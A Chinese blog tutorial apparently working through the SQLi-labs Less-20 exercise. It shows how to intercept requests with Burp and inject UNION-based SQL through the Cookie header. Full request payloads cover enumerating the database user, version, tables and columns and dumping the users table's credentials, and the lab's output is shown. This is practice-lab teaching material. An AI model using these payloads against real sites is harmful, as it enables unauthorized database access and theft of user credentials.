美文网首页
Cookie攻击

Cookie攻击

作者: taiji1985 | 来源:发表于2017-12-17 19:53 被阅读35次

Cookie攻击

很多网站为了能实现免登陆的功能,会使用cookie进行数据库查询,而产生了SQL注入点

工具

FireFox + Burp 或Firfox+hackbar插件。

Burp 是一个修改、重发Http请求的利器。。。
其原理是设置电脑的或浏览器的代理为127.0.0.1:8080,而Burp在这个地址监听,这样浏览器就会先将
请求发送到这个地址,Burp可以选择修改后,再转发出去。达到hack的目的。

步骤

  • 设置代理为127.0.0.1:8080 即Burp 的代理地址
  • 在Firefox中提交数据后,被Burp拦截
  • 在Burp中修改请求中的Cookie项目如下:

GET /sqli/Less-20/ HTTP/1.1
Host: www.any.com
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: uname=admin' and 1=2 union select 1,2,concat_ws('~',user(),database(),version())#
Connection: close
Cache-Control: max-age=0

  • 结果
image.png

可以再图中看到 当前主机用户、数据库 、 版本

获取表列表

修改Cookie后,构造如下串

GET /sqli/Less-20/ HTTP/1.1
Host: www.any.com
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: uname=admin' and 1=2 union select 1,2,unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security'#
Connection: close
Cache-Control: max-age=0

image.png

得到所有的表为:emails,referers,uagents,users

获取用户表结构

GET /sqli/Less-20/index.php HTTP/1.1
Host: www.any.com
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.any.com/sqli/Less-20/index.php
Cookie: uname=admin' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'#
Connection: keep-alive
Cache-Control: max-age=0

image.png

得到字段名
id,username,password

获取用户表内容

GET /sqli/Less-20/index.php HTTP/1.1
Host: www.any.com
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.any.com/sqli/Less-20/index.php
Cookie: uname=admin' and 1=2 union select 1,2,group_concat(id,'',username,'',password) from security.users#
Connection: keep-alive
Cache-Control: max-age=0

结果
1_Dumb_Dumb,2_Angelina_I-kill-you,3_Dummy_p@ssword,4_secure_crappy,5_stupid_stupidity,6_superman_genious,7_batman_mob!le,8_admin_admin,9_admin1_admin1,10_admin2_admin2,11_admin3_admin3,12_dhakkan_dumbo,14_admin4_admin4

image.png

相关文章

  • Cookie攻击

    Cookie攻击 很多网站为了能实现免登陆的功能,会使用cookie进行数据库查询,而产生了SQL注入点 工具 F...

  • 关于Web安全

    CSRF攻击 主要攻击对象是Cookie中保有用户状态的情况,如用Cookie保存SessionID或JWT这样在...

  • 安全性测试

    Js document.cookie过去当前页面cookie Xss跨站攻击 Sql注入 最通用攻击手段,关系型数...

  • XSS和CSRF

    xss:跨站点攻击。xss攻击的主要目的是想办法获取目标攻击网站的cookie,因为有了cookie相当于有了se...

  • web安全

    客户端安全 1、跨站脚本攻击(XSS) 危害:Cookie劫持 防御: Set-Cookie时给Cookie植入“...

  • 了解web安全-XSS

    XSS攻击: 盗用cookie获取页面信息 插入内容破坏页面结构 插入flash 实现DDOS攻击效果(DOS攻击...

  • Java Web技术经验总结(十七)

    好久不见 使用httpOnly标识避免XSS攻击,参见:说说HttpOnly Cookie的作用。解决XSS攻击,...

  • cookie和XSS攻击

    cookie是什么? cookie是一些数据,存储在用户电脑上的文本文件中。cookie以键值对的形式存储的。如u...

  • Django - CSRF

    X-CSRF攻击。黑客可以将被人的cookie拿走。黑客可以用这个cookie来登录。 CSRF原理:你们来我服务...

  • 前端XSS攻击

    什么是XSS攻击 XSS也称为跨脚本攻击,是一种恶意脚本,可以获取用户得cookie、token、session ...

网友评论

      本文标题:Cookie攻击

      本文链接:https://www.haomeiwen.com/subject/frduwxtx.html